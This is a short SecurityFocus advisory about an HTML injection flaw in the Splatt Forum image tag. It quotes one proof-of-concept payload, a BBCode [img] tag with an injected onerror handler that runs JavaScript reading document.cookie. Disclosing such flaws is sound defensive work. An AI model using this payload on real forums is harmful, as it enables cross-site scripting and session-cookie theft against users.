Splatt Forum Image Tag HTML Injection Vulneraility

MegaHz <megahz@megahz.org> has provided the following example:

[img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img]


 

Privacy Statement
Copyright 2010, SecurityFocus